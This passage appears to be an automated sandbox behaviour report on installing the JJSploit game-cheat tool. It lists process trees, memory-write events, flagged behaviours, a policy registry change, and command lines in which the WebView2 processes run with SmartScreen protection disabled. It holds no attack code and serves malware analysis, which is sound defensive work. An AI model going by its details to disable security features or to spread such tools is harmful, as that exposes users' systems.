msedge.exepid process 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exepowershell.exeMicrosoftEdgeWebview2Setup.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdge_X64_130.0.2849.52.exesetup.exeMsiExec.exeJJSploit.exemsedgewebview2.execmd.execmd.exemsedge.exemsedge.exedescription pid process target process PID 1292 wrote to memory of 1384 1292 msiexec.exe MsiExec.exe PID 1292 wrote to memory of 1384 1292 msiexec.exe MsiExec.exe PID 1292 wrote to memory of 1384 1292 msiexec.exe MsiExec.exe PID 1292 wrote to memory of 1932 1292 msiexec.exe srtasks.exe PID 1292 wrote to memory of 1932 1292 msiexec.exe srtasks.exe PID 1292 wrote to memory of 3780 1292 msiexec.exe powershell.exe PID 1292 wrote to memory of 3780 1292 msiexec.exe powershell.exe PID 3780 wrote to memory of 768 3780 powershell.exe MicrosoftEdgeWebview2Setup.exe PID 3780 wrote to memory of 768 3780 powershell.exe MicrosoftEdgeWebview2Setup.exe PID 3780 wrote to memory of 768 3780 powershell.exe MicrosoftEdgeWebview2Setup.exe PID 768 wrote to memory of 1044 768 MicrosoftEdgeWebview2Setup.exe MicrosoftEdgeUpdate.exe PID 768 wrote to memory of 1044 768 MicrosoftEdgeWebview2Setup.exe MicrosoftEdgeUpdate.exe PID 768 wrote to memory of 1044 768 MicrosoftEdgeWebview2Setup.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 2608 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 2608 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 2608 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 4428 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 4428 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 4428 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 4428 wrote to memory of 440 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe PID 4428 wrote to memory of 440 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe PID 4428 wrote to memory of 3672 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe PID 4428 wrote to memory of 3672 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe PID 4428 wrote to memory of 944 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe PID 4428 wrote to memory of 944 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe PID 1044 wrote to memory of 2712 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 2712 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 2712 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 3696 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 3696 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1044 wrote to memory of 3696 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1440 wrote to memory of 4380 1440 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1440 wrote to memory of 4380 1440 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1440 wrote to memory of 4380 1440 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1440 wrote to memory of 4332 1440 MicrosoftEdgeUpdate.exe MicrosoftEdge_X64_130.0.2849.52.exe PID 1440 wrote to memory of 4332 1440 MicrosoftEdgeUpdate.exe MicrosoftEdge_X64_130.0.2849.52.exe PID 4332 wrote to memory of 4788 4332 MicrosoftEdge_X64_130.0.2849.52.exe setup.exe PID 4332 wrote to memory of 4788 4332 MicrosoftEdge_X64_130.0.2849.52.exe setup.exe PID 4788 wrote to memory of 2736 4788 setup.exe setup.exe PID 4788 wrote to memory of 2736 4788 setup.exe setup.exe PID 1440 wrote to memory of 3220 1440 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1440 wrote to memory of 3220 1440 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1440 wrote to memory of 3220 1440 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe PID 1384 wrote to memory of 3724 1384 MsiExec.exe JJSploit.exe PID 1384 wrote to memory of 3724 1384 MsiExec.exe JJSploit.exe PID 3724 wrote to memory of 1164 3724 JJSploit.exe cmd.exe PID 3724 wrote to memory of 1164 3724 JJSploit.exe cmd.exe PID 3724 wrote to memory of 2592 3724 JJSploit.exe cmd.exe PID 3724 wrote to memory of 2592 3724 JJSploit.exe cmd.exe PID 3724 wrote to memory of 3604 3724 JJSploit.exe msedgewebview2.exe PID 3724 wrote to memory of 3604 3724 JJSploit.exe msedgewebview2.exe PID 3604 wrote to memory of 1600 3604 msedgewebview2.exe msedgewebview2.exe PID 3604 wrote to memory of 1600 3604 msedgewebview2.exe msedgewebview2.exe PID 2592 wrote to memory of 3148 2592 cmd.exe msedge.exe PID 2592 wrote to memory of 3148 2592 cmd.exe msedge.exe PID 1164 wrote to memory of 5044 1164 cmd.exe msedge.exe PID 1164 wrote to memory of 5044 1164 cmd.exe msedge.exe PID 3148 wrote to memory of 3768 3148 msedge.exe msedge.exe PID 3148 wrote to memory of 3768 3148 msedge.exe msedge.exe PID 5044 wrote to memory of 3960 5044 msedge.exe msedge.exe PID 5044 wrote to memory of 3960 5044 msedge.exe msedge.exe PID 3604 wrote to memory of 3244 3604 msedgewebview2.exe msedgewebview2.exe PID 3604 wrote to memory of 3244 3604 msedgewebview2.exe msedgewebview2.exe PID 3604 wrote to memory of 3244 3604 msedgewebview2.exe msedgewebview2.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
msedgewebview2.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedgewebview2.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\JJSploit_8.10.8_x64_en-US.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4604
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 94B7DBA97900214B47D5F97A945AA60C C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Program Files\JJSploit\JJSploit.exe"C:\Program Files\JJSploit\JJSploit.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\cmd.exe"cmd" /C start https://www.youtube.com/@Omnidev_4⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@Omnidev_5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbc45046f8,0x7ffbc4504708,0x7ffbc45047186⤵PID:3960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:26⤵PID:672
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:2276 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵PID:3324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:16⤵PID:3044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:16⤵PID:4200
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:16⤵PID:5132
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:86⤵PID:5836
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:6008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:16⤵PID:6124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:16⤵PID:6132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:16⤵PID:2172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:16⤵PID:1256
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:16⤵PID:1632
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:16⤵PID:1392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 /prefetch:26⤵
- Suspicious behavior: EnumeratesProcesses
PID:4360 -
C:\Windows\system32\cmd.exe"cmd" /C start https://www.youtube.com/@WeAreDevsExploits4⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@WeAreDevsExploits5⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffbc45046f8,0x7ffbc4504708,0x7ffbc45047186⤵PID:3768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,10340906066649243167,10254102589260337003,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:26⤵PID:4592
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,10340906066649243167,10254102589260337003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:3776 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-features=msWebOOUI,msPdfOOUI,msSmartScreenProtection --lang=en-US --mojo-named-platform-channel-pipe=3724.4528.24361783564329320354⤵
- Checks computer location settings
- Checks system information in the registry
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3604 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=130.0.2849.52 --initial-client-data=0x15c,0x160,0x164,0x138,0x174,0x7ffbc40e4dc0,0x7ffbc40e4dcc,0x7ffbc40e4dd85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1772,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=1764 /prefetch:25⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3244 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1988,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:35⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4872 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2312,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=2328 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3140 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3348,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=3368 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4808 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2080,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4760 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1860 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4784,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5564 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4900,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4488 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5004,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5628 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5096,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3616 -
